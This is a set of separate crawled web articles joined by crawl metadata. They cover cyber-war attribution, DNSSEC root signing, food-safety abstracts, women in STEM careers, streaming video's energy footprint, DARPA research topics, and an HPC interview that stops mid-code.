But there's scant proof that the Russian government launched or sponsored online attacks against Georgia, according to many security experts, including Robert David Graham, CEO of Errata Security. "There's no evidence the cyber attacks were by the Russian government, or that they were anything more than normal 'citizen hacktivism,'" he said in a blog post. It's notable that this supposed first-ever cyber war served no clear military purpose. Attackers compromised informational government websites, not critical infrastructure systems or military networks.
To be fair, even the would-be practitioners of cyber warfare -- namely, the U.S. military -- are themselves soliciting input on what offensive computer system attacks might look like, either on their own or in conjunction with physical operations and kinetic attacks.
Last year, for example, the Defense Advanced Research Projects Agency (DARPA) issued a call to tech vendors for "cyberspace warfare operations" capabilities, as part of what Darpa dubs Plan X. Darpa seeks a broad range of capabilities, from a scripted counterresponse to a cyber attack to IT infrastructure that could be hardened to withstand attacks.
Similarly, the Air Force Life Cycle Management Center last year called on contractors to submit concept papers for "cyberspace warfare operations" capabilities, including "cyberspace warfare attack" and "cyberspace warfare support."
Capabilities on the Air Force wish list include "employing unique characteristics resulting in the adversary entering conflicts in a degraded state." In other words, why blow up an enemy's tank if you can instead somehow infect and kill the tank's electrical system?
Who else is bolstering their cyber war capabilities? Iran is a strong candidate, and in April 2012, the VP of the American Foreign Policy Council, Ilan Berman, told a U.S. House committee that Iran has been boosting its cyber warfare resources in the wake of online attacks against the country. The attacks include Stuxnet, malware blamed in 2010 for trying to attack power plant infrastructure. U.S. officials have accused the Iranian government of sponsoring DDoS attacks against U.S. banks. China has reportedly mobilized its own cyber army, and Russia last year launched a recruitment drive to find the country's best hacking minds, seeking people versed in "methods and means of bypassing antivirus software, firewalls, as well as in security tools of operating systems," the newspaper Pravda reported.
But while governments don't face the same legal problems that companies do when considering offensive attacks, they do face the same major intelligence challenge: accurately tracing an attack's true origin, a process known as attribution. While small-time cybercriminals may leave tracks, government-backed professionals will go to great lengths to hide what they're doing -- or perhaps, pin blame on another enemy. | <urn:uuid:da7f5477-4a1b-471e-8f95-28531a1c433f> | CC-MAIN-2017-09 | http://www.darkreading.com/risk-management/uncertain-state-of-cyber-war/d/d-id/1108255?cid=sbx_byte_related_commentary_government_and_vertical_industry_security_nasa_tightens_security_in_response_to_in&itc=sbx_byte_related_commentary_government_and_vertical_industry_security_nasa_tightens_security_in_response_to_in | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00224-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.946316 | 722 | 3.03125 | 3 |
Back in January 1997, a group of people developed RFC 2065, Domain Name System Security Extensions, a document detailing the introduction of private/public key cryptography into the public DNS system. By adding cryptography to the DNS, users would be able to verify that DNS responses they receive are genuinely valid and accurate. The design of DNSSEC was updated in March 1999 by RFC 2535 but was never deployed.
In March 2005, RFCs 4033, 4034, and 4035 were published, detailing a new version of the protocol named DNSSEC-bis. This version of the protocol is easier to understand and deploy, but it received little attention until the summer of 2008. Those of us in the industry knew that DNSSEC was important, but operational management, increased query size, and technical problems with many implementations of DNS prevented it from being deployed.
The "DNS Summer of Fear" occurred in 2008, when security researcher Dan Kaminsky exposed a vulnerability in the DNS protocol where DNS cache poisoning could be achieved in just a few seconds allowing an attacker to spoof the DNS identify of a website. A short term fix, known as DNS Source Port Randomization, was deployed to help fend off attacks, while movement on a long term solution began work. The long term fix requires the use of DNSSEC to securely sign and validate the global DNS system, and with all things DNS, starts with the security of the DNS Root Zone, a.k.a ".".
The DNS Root Zone is produced and maintained through a collaborative effort between ICANN, VeriSign, and the U.S. Department of Commerce. These three organizations have been working extensively to develop a secure and transparent way to manage the signing of the Root Zone since early 2009, and on July 15, 2010, the fruits of their labor will become reality when the signed root is deployed.
On June 16, 2010, the first of two Root Key Signing Key (KSK) generation ceremonies was performed at a secure ICANN facility in Culpeper, VA. On July 12, 2010, a second KSK ceremony will occur at a second secure ICANN facility in El Segundo, CA. The purpose of these ceremonies is to generate the specialized cryptographic materials needed to sign the root zone, distribute copies to two secure facilities, distribute the cryptographic fingerprint data to Trusted Community Representatives (TCRs) for verification, and to distribute crypto material to Recovery Key Share Holders in case of failure of these two ICANN facilities.
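Root signing matters because of DNSSEC's chain of trust: each parent zone publishes a digest of its child zone's key (a DS record), so trust in any signed zone chains up to the root KSK. The toy sketch below illustrates only the idea — the real DS digest (RFC 4034) is computed over the owner name in DNS wire format plus the DNSKEY RDATA, which this simplification skips, and the key bytes here are made up:

```python
import hashlib

def ds_digest(owner_name: bytes, dnskey_rdata: bytes) -> str:
    """Parent-side fingerprint of a child zone's key (simplified DS record)."""
    return hashlib.sha256(owner_name + dnskey_rdata).hexdigest()

# The parent (ultimately the signed root) publishes a digest of the child's key...
child_key = b"example-dnskey-rdata"
published_ds = ds_digest(b"example.", child_key)

# ...and a validating resolver recomputes it from the key the child actually serves.
def key_matches_parent(owner_name: bytes, served_key: bytes, parent_ds: str) -> bool:
    return ds_digest(owner_name, served_key) == parent_ds

print(key_matches_parent(b"example.", child_key, published_ds))        # genuine key
print(key_matches_parent(b"example.", b"attacker-key", published_ds))  # substituted key
```

Because every link in the chain is verified this way, a resolver that trusts only the root KSK can detect a forged key anywhere below it — which is why signing "." was the prerequisite for everything else.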
At Dyn Inc., we await the deployment of the signed Root Zone with much excitement. A signed root zone means that key stakeholders are paying attention to the criticality of the DNS and the role it serves in the Internet. To do our part, we've taken the following steps to DNSSEC-enable our systems and infrastructure:
In the coming months, we'll continue to enable DNSSEC communication with other registries, and develop additional ways to manage DNSSEC crypto material to provide our users with an easy and simple path to DNSSEC signing their DNS zones. In the meantime, we all look forward to the signed root deployment on July 15th.
Written by Tom Daly, Chief Technology Officer at Dynamic Network Services, Inc.
Dyn is a cloud-based Internet Performance company. Dyn helps companies monitor, control, and optimize online infrastructure for an exceptional end-user experience. Through a world-class network and unrivaled, objective intelligence into Internet conditions, Dyn ensures traffic gets delivered faster, safer, and more reliably than ever. Learn More
|Data Center||Policy & Regulation|
|DNS Security||Regional Registries|
|Domain Names||Registry Services|
|Intellectual Property||Top-Level Domains|
|Internet of Things||Web|
|Internet Protocol||White Space|
Afilias - Mobile & Web Services | <urn:uuid:f50af8b3-62ba-4244-befd-fb7746ed383e> | CC-MAIN-2017-09 | http://www.circleid.com/posts/the_root_dnssec_deployment_and_dyn_inc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00576-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.917254 | 791 | 3.125 | 3 |
Holownia P.,Sanitary Inspectorate |
Jaworska-LUczak B.,Sanitary Inspectorate |
Wisniewska I.,Sanitary Inspectorate |
Bilinski P.,Sanitary Inspectorate |
And 3 more authors.
Polish Journal of Food and Nutrition Sciences | Year: 2010
The prebiotic inulin is a non-digestible carbohydrate which occurs naturally throughout the normal human diet. Following passage through the gastro-intestinal tract inulin ultimately becomes metabolised to fructose by colonic bacteria, especially the beneficial species, whose growth are also promoted at the expense of the harmful types. There has been much recent attention by industry and the general public in the EU concerning inulin and prebiotics, especially in the marketing of their derived/supplemented products that includes the Central & East European region, (CEE) [Halliday, 2008]. Major benefits to human health have been reported variously worldwide and chiefly consist of maintaining healthy microbial gut homeostasis, reducing gut inflammation and infection, preventing colonic cancer, increasing mineral reabsorption, decreasing cholesterol, improving bowel habits, being of use in diabetic treatments and enhancing immune function. Inulin can thus be of great potential benefit to public health not just through these physiological effects but also in helping to reduce weight by replacing fat and digestible carbohydrate in food products. It is also important however to recognise the likely hazards of inulin arising mainly from fructose intolerance and rare cases of allergy. In addition under certain medical conditions it is possible that the growth of other harmful gut bacterial species may become stimulated with a potential but as yet unproven link to autoimmune disease. This article aims to review and discuss the scientific evidence as well as addressing general concerns raised by consumers and the general public alike. Recommendations based on current knowledge are suggested at the end. © Copyright by Institute of Animal Reproduction and Food Research of the Polish Academy of Sciences. Source
Bilinski P.,Sanitary Inspectorate |
Bilinski P.,Institute of Haematology and Transfusion Medicine |
Kapka-Skrzypczak L.,Institute of Rural Health |
Kapka-Skrzypczak L.,Health Management Technology |
And 4 more authors.
Annals of Agricultural and Environmental Medicine | Year: 2012
Shiga toxin producing Escherichia coli (STEC) are the most virulent diarrhoeagenic E. coli known to date. They can spread with alarming ease via the food chain, as recently demonstrated by the large outbreak of STEC O104:H4 borne by sprouted seeds in 2011, clustered in northern Germany, and subsequently affecting other countries. Indeed, a significant number of infections to verocytotoxin producing Escherichia coli O104:H4 have been reported from the WHO European Region resulting in many cases of bloody diarrhoea and haemolytic uraemic syndrome in Germany, 15 other European countries and North America. Eventually, the European Food Standards Agency, (EFSA), identified the likely source to a single consignment of fenugreek seeds from an Egyptian exporter as being linked to the two outbreaks in Germany and France. The situation was closely monitored by the Chief Sanitary Inspectorate public health authority in Poland where actions undertaken ensured that the public was well informed about the dangers of STEC contamination of food, how to avoid infection, and what to do if infected. Tracing the fenugreek distributors also enabled the identification of suspected batches and their isolation. As a result, there were very few reported cases of STEC infection in Poland. Effective control over such outbreaks is therefore a vital public health task. This should include early detection and rapid identification of the contagion mode, followed by removing the foodstuff(s) from the market, providing consumer advice, and preventing secondary spreading. As a mitigation measure, screening/monitoring those involved in food handling is also warranted to exclude carriers who can be asymptomatic. 
Source | <urn:uuid:98825f4d-f630-47c0-97be-6152fb8bd269> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/sanitary-inspectorate-1834587/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00100-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938969 | 822 | 2.640625 | 3 |
Tackling the problem of getting women into STEM careers
This feature first appeared in the Summer 2015 issue of Certification Magazine. Click here to get your own print or digital copy.
Tech skills will be required in 80 percent of all jobs in the next decade, yet women in technology have been declining since 1991. At the current rate of decline, fewer than 1 percent of the global tech workforce will be female by 2043.
STEM (science, technology, engineering, and math) jobs are twice as likely to be held by men, even in a randomized, double-blind study. Monica Eaton-Cardone, founder and CIO of Global Risk Technologies, says that in order for today’s women to have a chance tomorrow, gender must become a non-factor.
“The opportunity to add a valuable contribution to society through technology is a benefit that should be promoted more — especially to women,” says Eaton-Cardone. She believes that women are interested in STEM opportunities, but don’t get many chances to develop or pursue that interest. Eaton-Cardone points to the 66 percent of fourth-grade girls who are interested in math and science — yet only 18 percent of college engineering majors are female. Currently, only 1 in 4 STEM jobs is held by a woman. Eaton-Cardone says that in order to change this, women need to be encouraged and women need to be educated on the growing potential of STEM careers.
Eaton-Cardone is a unique case for women in STEM, excelling in a field of men despite having no formal IT background. Her creative solutions for payment processing in Chargebacks911, eConsumerServices, and Global Risk Technologies have enabled merchants, consumers and banks to find solutions for their online businesses. Even taking the rare success stories into account, however, there are many questions when it comes to women in STEM:
● Why do young girls lose their enthusiasm for math and science?
● How can society offer encouragement to women in STEM?
● Why are STEM industries averse to women?
● What programs/opportunities exist to encourage girls in STEM?
● How can companies learn about potential bias in hiring practices? What can they do to change this?
● What are your recommendations to women who would like to get into technology or IT?
Monica Eaton-Cardone made a career out of discovering where there is a problem and then solving it herself. She then develops solutions for others who are experiencing the same problem. Eaton-Cardone has a 20-year background in developing retention campaigns, which entails developing technologies around monitoring key performance indicators to help track advertising performance, customer acquisition trends, and other factors that help to secure customers.
Her career expanded to the online arena, which she claims is a totally different ballgame because it is constantly evolving. As with brick-and-mortar businesses, principles such as “The customer is always right” are important. But the online arena uses a spaceless customer where there is less accountability for both consumer and merchant, and a reduced barrier to entry for merchants on a global scale. That introduces some unique problems in business — problems that are hard to quantify because online business is a moving target.
Take chargeback and credit card processing, for instance: “Technology solutions follow the technology criminals,” Eaton-Cardone says. “It is the ‘genius criminals’ who are actually responsible for creating a revolution in this industry because we’re all trying to stay ahead of them — and keep up with the loopholes that they expose — to make our systems even more secure. However, the minute you think that you have the best, most secure system, you’re dead in the water because just a few months go by and someone else has figured out some other way to expose a weakness in your online presence.
“You have to continually re-invent and recognize that the most relevant data to analyze when it comes to the economy today is the present, not necessarily historical. I developed a software program strictly for my own use because I found there was such confusion in handling chargebacks and being able to analyze risk in the online environment. Lo and behold, there were a number of other online merchants who needed that solution as well, which gave birth to Global Risk Technologies to serve these online merchants.”
Eaton-Cardone’s first project was developing a VOIP (Voice Over IP) technology that connected call centers in four countries so that she could analyze the results. Her education lies in architecture, so she was not exactly interested in IT. What she was interested in, though, was building things and solving problems. She enjoys math, and she likes organizing ways to solve a problem. Technology was something she fell into as a result of solving a problem with well-defined requirements.
Can any of us get away from technology? Eaton-Cardone says that every woman on the planet has a natural interest in technology and would expose that talent if she tried it. She believes that women, in general, have an aptitude for design and creativity, tapping into their talents in structure and organization. Most mothers are proficient multi-taskers, she says. This is what technology is! Women just use a different set of tools.
Eaton-Cardone has a daughter who is 8. Her daughter is as good with Legos as any boy of the same age, and Eaton-Cardone is certain that her daughter would enjoy a robotics class. At the same time, she’s certain that her daughter would not consider taking such a class without ample encouragement from her mother. By their teenage years, most girls have not been afforded much opportunity to be exposed to what technology is.
Girls would enjoy developing a computer program on their iPhones because it’s creative. They would be designing something — it’s not just math; they’d be applying their talents. “Boys are probably more likely to learn math at a faster pace because they take courses like wood shop, and guess what wood shop is?” Eaton-Cardone says. “A bunch of angles that allow them to apply math to their creativity with the wood; they’re learning a skill (wood shop) in tandem with math.”
How do we provide the same opportunities to girls? The top-down approach — putting pressure on corporations to hire more women — is not only unworkable but is actually damaging. What ends up happening is that people are interviewed to become computer programmers or coders, and there aren’t any women to interview. Eaton-Cardone says she may have one woman out of 100 applicants, and she must fight the impulse to hire that one woman, because to do so would make that woman a charity case.
Suppose, for example, that the lone female applicant is not as qualified as the male applicants. So now there is a woman who is setting an example for every other woman, and she’s not very good. To hire her simply to make a statement would not be fair to her, to women in general, to the corporation, or to the 99 men who applied. Trying to incentivize female applicants with money or scholarships doesn’t work because men and women go to college to pursue their passions. Oftentimes money is not enough to get them to change their passions. One needs to start at a younger age.
Eaton-Cardone says she overheard a man at a seminar, who said, “We’re giving everyone the same opportunity.” But Eaton-Cardone claims it’s not an opportunity if we’re telling a 13-year-old to choose between a sewing class and learning robotics. It would be an opportunity to actually require students to take a robotics class to allow that exposure to technology to happen.
“If the only piano players we had on the planet were very young children who expressed a desire to learn piano, we’d have no pianists,” Eaton-Cardone says. “You expose them to something with parental stewardship, and the children learn whether or not they have a talent for the skill and become engaged. Boys are drawn to STEM because they are more naturally interested in computer games, and girls are drawn to creativity and design work. Women aren’t given an opportunity early in their lives to put their creativity and design talents together with technology.”
Technology is a genderless field. One cannot expect a girl at the age of 13 to decide everything in which she’s going to be interested. In Asia, girls are required to take trigonometry, which allows them to consider a career in STEM. Many IT pros are given the flexibility to work from home or telecommute. If one has the talent, one has terrific flexibility and opportunity if a STEM field is chosen. Women do not recognize the freedom that is afforded by a STEM field. One is hired because of one’s talent and interest in STEM, just as men are.
It would be interesting to see how many girls would pursue a STEM career if they took wood shop. Expose them to areas outside a traditional girl’s comfort zone, and more girls will go into STEM. The best learning comes when there is an application method for the theory being taught. Girls can’t be expected to naturally excel in math when they are only given theory without any application for it. Boys are naturally choosing things that apply the math theory.
Eaton-Cardone: “We like to say that a person either has the STEM gene or he/she doesn’t. At Global Risk Technologies, we hire a woman as an executive assistant, and we will reveal her hidden abilities in numbers. We hear women saying, ‘I like to help people,’ and women don’t realize that majoring in STEM will allow them to help many more people than studying non-STEM subjects. But they’ve never seen how they can apply their natural abilities. You can learn how to do anything online. Opportunities are boundless. It’s back to having confidence in trying new things; thinking outside the box. It is damaging to women to tell them they are the underdog. The men out there are producing. Don’t be afraid to start at the very bottom, and if you perform, the company will recognize this. If you feel sorry for yourself, you will become a liability to that company.”
Some final advice to women in technology from Monica Eaton-Cardone: Find a subject about which you can be passionate. Find a mentor in that subject area and become excellent at it. This takes work and many hours. Turn your interest into a passion. Invest in yourself. Pick it and stick with it.
Actor Marc Anthony told reporter Meredith Vieira what his father said to him many years ago. “My dad told me early on, he said, ‘Son, we’re both ugly.’ I swear, he says it to this day. And he goes, ‘You work on your personality. It builds character.’ ” We would have a better planet if both men and women put 100 percent of their efforts into their passion for something. Why can’t that something be STEM? | <urn:uuid:1967fbe8-cddc-4b30-ab9c-4c530ec68d2a> | CC-MAIN-2017-09 | http://certmag.com/tackling-problem-getting-women-stem-careers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00276-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.96955 | 2,328 | 2.765625 | 3 |
The next time you watch “House of Cards” on Netflix, think about the impact you might be having on the environment.
As the Internet powers ever more services, from digital video to on-demand food delivery, energy use in data centers will rise. To reduce their impact on the environment, companies like Apple, Google and Facebook have taken big steps to power their operations with renewable energy sources like hydro, geothermal and solar.
But despite those efforts, the growth of streaming video from the likes of Netflix, Hulu and Google’s YouTube presents a pesky challenge to the companies’ efforts to go green, according to a report Tuesday from Greenpeace.
“The rapid transition to streaming video models, as well as tablets and other thin client devices that supplant on-device storage with the cloud, means more and more demand for data center capacity, which will require more energy to power,” the report’s authors wrote.
It might seem that online services, like video streaming, would reduce carbon footprint versus, say, driving to a movie theater. But by enabling much higher levels of consumption, the shift to digital video may actually be increasing the total amount of electricity consumed, and the associated pollution from electricity generation, the report said.
“Unless leading Internet companies find a way to leapfrog traditional, polluting sources of electricity, the convenience of streaming could cause us to increase our carbon footprint,” wrote the authors of the report, ”Clicking Green: A Guide to Building the Green Internet.”
The report ranked companies efforts in the area of renewable energy, by looking at company supplied data on energy use, publicly available information, and other data center investments. Apple took top marks, partly due to its investments in solar and its level of transparency toward reducing its carbon and energy footprints for its data centers. Google and Facebook also scored highly, partly due to their lowered reliance on dirtier forms of energy like coal and natural gas.
The authors did not rank Netflix, YouTube or Hulu, but they did identify online video as by far the biggest driver of consumer Internet data. Streaming video services now make up more than 60 percent of consumer Internet traffic and are expected to be 76 percent of traffic by 2018, according to the Greenpeace report, citing data from Cisco.
YouTube owner Google has a long term goal of being 100 percent renewably powered, though it’s currently only at 35 percent. In the Greenpeace ranking, Google achieved a clean energy index of 46 percent—Apple got 100 percent—which took into account Google’s energy transparency and its specific renewable energy projects. Over the past year Google has signed three long-term contracts to buy clean energy from producers, the Greenpeace report said, adding to six previous contracts. The company has also advocated for policies that would reduce the U.S. dependence on coal and fossil fuels.
In addition to rising consumer data demands, the report’s authors identified uncooperative utilities that rely on coal to generate power in data center hot spots like Virginia and North Carolina, as a barrier toward wider use of renewable energy.
In North Carolina, customers are not allowed to buy power from anyone other than Duke Energy, which gets only 2 percent of its electricity from renewable sources, according to Greenpeace. Google and other IT companies have supported a renewable energy tariff for large customers in North Carolina, the report said, but Google has not signed up for the program. | <urn:uuid:7320af14-d38c-413e-b9a8-726fe824f2ba> | CC-MAIN-2017-09 | http://www.itnews.com/article/2921896/greenpeace-fingers-youtube-netflix-as-threat-to-greener-internet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00276-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949408 | 701 | 2.875 | 3 |
If you are looking to develop some far out advanced science project -- and the folks at the Defense Advanced Research Projects Agency have a ton from airplanes that can fly for years without landing to skeletal putty for fractured bones – then DARPA wants you.
The military’s cutting edge research agency is accepting scientists for its Computer Science Study Group (CSSG) who’s goal is to quickly identify ideas in the field of computer science that DARPA says will provide revolutionary advances to the Department of Defense (DoD).
The CSSG has, as you might guess, a wide and varied list of projects it would like to see. Some of those include:
· Bio-inspired Exploitation Systems: Bat sonar, ant colonies, and immune systems are examples of biological systems that have inspired the development of algorithms applicable to difficult and large problems in a variety of areas. Examples include genetic and evolutionary algorithms, neural networks, new ideas for developing routing algorithms in wireless networks inspired by biology, including software and algorithms endowed with capabilities such as adaptation, evolution, growth, healing, replication and learning. Potential applications of interest to the military include autonomous intelligent vehicles, adaptive video processing algorithms, flight and other control systems, and medical data analysis.
· Biometrics: DARPA is interested in the development of novel and improved technologies for measuring and analyzing human body characteristics, such as fingerprints, eye retinas and irises, voice patterns, facial patterns and hand measurements, for authentication purposes. Desirable characteristics of proposed techniques include minimizing key metrics such as the percent of invalid users who are incorrectly accepted as genuine users, the percent of valid users who are rejected as imposters, and the percent of valid users who are not recognized by the system.
· Complexity Theory: Complexity theory deals with classifying computational problems by the amount of computational resources they require, or, more specifically, the number of processing steps and the memory required for their solution. DARPA is particularly interested in means of determining what techniques exist for speeding up the solution of problems in high performance computing, and what the bounds on computation speed are for various types of computer architectures, including scalar, parallel, distributed network, etc.
· Computer Vision: Computer vision is devoted to picture and video analysis to achieve results comparable to those of a human viewer. Potential applications include medical imaging, video surveillance, detection and tracking of individuals and vehicles, and video compression. Methods that include implementation of machine learning are of particular interest, but DARPA will also consider methods designed to solve specific tasks more effectively than previous systems.
· Detecting Deviations from Normalcy: Pattern recognition theory tends to focus on events and patterns that are relatively constant over time. Dynamic models of activity, however, attempt to analyze trends and extrapolate patterns to expected behavior patterns in the future. Beyond predicting trends in patterns that an analyst might wish to detect because they represent a threat, more advanced theories might attempt to model or predict patterns that represent normal behavior, so that threats can be detected as deviations from that normalcy pattern. Potential applications include the detection of intrusions in computer systems and networks, and the detection of medical anomalies.
· Information Accessibility, Integration, and Management: DARPA is interested in next-generation methods, tools, and technologies to make it possible to access, integrate, analyze, and efficiently manage massive stores of widely distributed, heterogeneous information. These capabilities will help human analysts make better use of all available information resources in the pursuit of knowledge relevant to military applications. Examples of possible research areas include development of human-computer interaction features that enable rapid, easy access to and understanding of heterogeneous information, and of cognitive systems able to “learn,” adjust to change, and repair themselves to enhance battlefield robots.
· Machine Learning: Machine learning is the study of computer algorithms that improve automatically through experience, typically involving systems that perform tasks associated with artificial intelligence. DARPA is interested in techniques for improving the efficiency and effectiveness of systems via the autonomous acquisition and integration of knowledge, and exploitation of this knowledge to enable continuous self-improvement. Potential military applications include robot locomotion, wargaming, object recognition in computer vision, speech and handwriting recognition, bioinformatics, and medical diagnosis.
· Network Management and Modeling: Our military services depend on a broad array of interacting physical, informational, cognitive, and social networks. Greater fundamental network understanding is essential to insure they function reliably and smoothly, and are not vulnerable to attack. This gap between what is known and what is needed to ensure the reliable and secure operation of complex networks makes the transition to network-centric operations problematic. DARPA is interested in developing the fundamental knowledge necessary to design large, complex networks in a predictable manner.
· Pattern Recognition: Pattern recognition aims to classify data (patterns) based on either a priori knowledge or on statistical information extracted from the patterns. The patterns to be classified are usually groups of measurements or observations, defining points in an appropriate multidimensional space. New and innovative breakthroughs in pattern recognition would be immediately applicable to information analysis.
· Smart Surveillance Systems: DARPA is interested in smart surveillance systems that use automatic image understanding techniques to extract information from the surveillance data. In addition to proposals which consider the information extraction aspect of the challenge, DARPA will also consider those that address the use of extracted information in the context of search, retrieval, data management and investigation.
· Software Engineering: The process of software development and evolution is an ambitious undertaking involving complex, incomplete, sometimes inconsistent and often fuzzy factors. Variables concerning design, quality, reliability, stakeholder interests and objectives, moving targets, and constraints such as budget and timeline must all be considered throughout a dynamic life cycle. The challenge is to provide sound methodological support for enabling good decisions about processes and products, risks and bottlenecks as well as for selection of tools, methods and techniques.
DARPA estimates up to 12 researchers will be accepted as part of the 2009 CSSG. August 11, 2008 is the cutoff date.
Layer 8 in a box Check out these other hot stories: | <urn:uuid:495236d7-0a23-4127-87ef-42cbb891c738> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2344880/security/darpa-looking-for-wicked-cool-researchers-for-advanced-study-group.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00452-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927905 | 1,239 | 2.609375 | 3 |
Steve Wallach, a supercomputing legend and recipient of the 2008 IEEE Seymour Cray Award, has participated in all 22 supercomputing shows. He is known for his contributions to high performance computing through the design of innovative vector and parallel computing systems. He is co-founder and chief science officer for Convey Computer Corp., a new company with a hybrid-core computer that marries the low cost and simple programming model of a commodity system with the performance of customized hardware architecture.
Never short on opinions, especially when it comes to high performance computing, Steve Wallach talked to HPCwire about the future of HPC and how lessons from the past can point the way for the future.
HPCwire: There’s been a lot of talk about how recent architecture advancements will bring GPU computing into the mainstream for high performance computing with significant speedups and energy savings. You disagree. Why?
Steve Wallach: GPUs are an interesting technology, and some applications will probably see significant speed-ups, but I don't see them in the mainstream. Here's why: programmers will have to put in a lot of effort to get the speed-up. Real-world applications consist of millions of lines of code, and organizations have invested too much money in those programs. If you tell them they have to modify those programs to use your technology, you lose. And it's not just the software that has to be changed; it is the entire programming ecosystem: debuggers, profilers, and memory tools. Anything that disturbs those underlying realities is destined to become a niche player. This is the biggest difference between an accelerator and a coprocessor. A coprocessor is an extension to the instruction set and is part of the same environment. GPUs are not. A GPU involves two different programming environments, and you have to move the data back and forth between them to get the benefits. The host cannot see the memory of the GPU; there are two separate address spaces.
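The cost of that back-and-forth data movement can be sketched with a simple offload model (an Amdahl-style back-of-the-envelope, not measured data; the numbers below are illustrative, not figures for any particular GPU): even a large kernel speedup yields modest overall gains once host-to-device copies are counted.

```python
def offload_speedup(frac_accel, kernel_speedup, transfer_frac):
    """Overall speedup when a fraction of runtime is offloaded to an accelerator.

    frac_accel     -- fraction of original runtime spent in the offloaded hot spot
    kernel_speedup -- how much faster the accelerator runs that hot spot
    transfer_frac  -- host<->device copy time, as a fraction of original runtime
    """
    new_time = (1 - frac_accel) + frac_accel / kernel_speedup + transfer_frac
    return 1.0 / new_time

# A 10x kernel speedup on 80% of the program:
print(round(offload_speedup(0.8, 10.0, 0.0), 2))  # -> 3.57 if transfers were free
print(round(offload_speedup(0.8, 10.0, 0.3), 2))  # -> 1.72 once copies cost 30%
```

In this toy model the explicit copies, not the kernel, dominate the result, which is the productivity and performance trap Wallach describes.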
It’s similar to what we saw with attached array processors in the 80s. What we saw back then was that you had to explicitly move and manage the data — which reduced programmer productivity, raised the actual cost of ownership and ultimately reduced performance. Like back then, the GPU programming model is different from its host.
GPUs initially did not have ECC memory; now they do. This, however, demonstrates that they were not designed around general-purpose computing requirements. You have to work hard to make it work, and not every application is amenable. The memory structure of a GPU is meant to be optimal for sequential access, but many programs require non-unity stride, which will reduce performance for those applications. Classical supercomputers from Cray, Convex, NEC, and Fujitsu had very high-bandwidth, highly interleaved main memory. A GPU is not going to be a general-purpose or a widespread solution, for technical and software reasons. You can only execute the “hot spot” on the GPU, for example, and still need a classical host like the x86. It is not an integrated system. And, as of now, GPUs do not support virtual memory.
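The non-unity-stride point can be made concrete with the standard interleaved-memory model: with B banks, a stride-s sweep touches only B/gcd(s, B) distinct banks, so power-of-two strides on a power-of-two bank count serialize badly. (The 16-bank count below is illustrative only, not a figure for any specific machine.)

```python
from math import gcd

def banks_touched(stride, num_banks):
    """Distinct banks hit by a stride-`stride` sweep over `num_banks` interleaved banks."""
    return num_banks // gcd(stride, num_banks)

# With 16 interleaved banks (illustrative):
for s in (1, 2, 16, 17):
    print(s, banks_touched(s, 16))
# stride 1  -> 16 banks, full parallelism
# stride 2  ->  8 banks, half the bandwidth
# stride 16 ->  1 bank, fully serialized
# stride 17 -> 16 banks (odd strides avoid conflicts)
```

This is why the highly interleaved memories of the classical vector machines Wallach mentions tolerated non-unit strides far better than memory systems tuned only for sequential access.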
The GPU is really just a contemporary version of an attached array processor. If you look at the last 30 years, the architectures that have succeeded in the long term have been the ones that are easiest to program and that fit into the current environment. New languages take time to be learned and adopted. Organizations can’t hire the right people to program the machines. Each new full-time equivalent programmer who has to be hired can easily add $200,000 to $300,000 to the costs of the new system per year. This is not a new phenomenon; it has been true for the past few decades. The time to reconfigure is really expensive.
HPCwire: You’ve said that “software is the ‘Trojan Horse’ of high-performance computing.” What do you mean by that?
Wallach: As an organization, you accept the hardware — the horse — and then the next day the software warriors pour out and devour your IT department. As technology enthusiasts, we get excited by new technologies based on peak micro-architectural performance, and the software questions come later, along with questions like “how do I fit it into my environment?” and “will I be able to achieve this level of performance with my applications?”
This has been true for the last 30 years and will be true for the next 30. If you go back to the '80s, you had all kinds of interesting technologies, like array processors, but the ones that had the best software succeeded, such as Convex, Cray, and Alliant. They succeeded because the programmer could leverage the technology from their FORTRAN and C environments. Integrated solutions like these succeeded, and companies like CDC failed because their software was part of an anemic development environment. As another example from the past, the Japanese vendors (Fujitsu and NEC) had exceptional software environments.
Fast forward to today. It’s like déjà vu all over again. A lot of new technologies are evolving but are not dealing with the software environment. Previous FPGA vendors had this problem. They were not integrated with the host environment. Vector processors, such as ClearSpeed, have this problem and this is true of all accelerators and GPUs.
The GPUs have some great technologies for visualization, for example, but they are not integrated. You have to learn how to program in new languages like CUDA, and there aren't a lot of major applications written in CUDA. Programmers have to re-code or set up source-to-source translators from FORTRAN to CUDA, rather than compiling FORTRAN directly to assembly code. From a technical perspective, direct compilation is much more efficient: source-to-source translators are NOT as efficient as compilation to assembly code.
HPCwire: You talk about Convey’s hybrid-core computer as being an application specific, low power node. What is the significance of this description to the market?
Wallach: In the past decade, every generation has added new, specific instructions to general-purpose computers to speed performance. For example, the current x86 system enhances image processing, and new instructions have been developed to enhance vector processing. Since clock rates are basically flat, you will see the trend toward specific instructions built into microprocessors increasing. If one instruction can replace 10 instructions, you will have reduced power for that application. Our view is that it is now time to step up and increase the functionality of this approach: we advocate having one instruction replace 100 instructions. Now you don't have to rely on clock rate to increase performance; you are relying instead on data and control paths. This approach is extremely useful for Convey and allows us to significantly increase performance while reducing power requirements, footprint, and overall facility costs for a data center.
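By way of software analogy (this is NumPy, not Convey's actual instruction set), replacing many scalar instructions with a single fused operation looks like the following sketch:

```python
import numpy as np

# "Many instructions": an explicit scalar loop, one multiply and one add
# per element, issued as separate operations.
def saxpy_loop(a, x, y):
    out = [0.0] * len(x)
    for i in range(len(x)):
        out[i] = a * x[i] + y[i]
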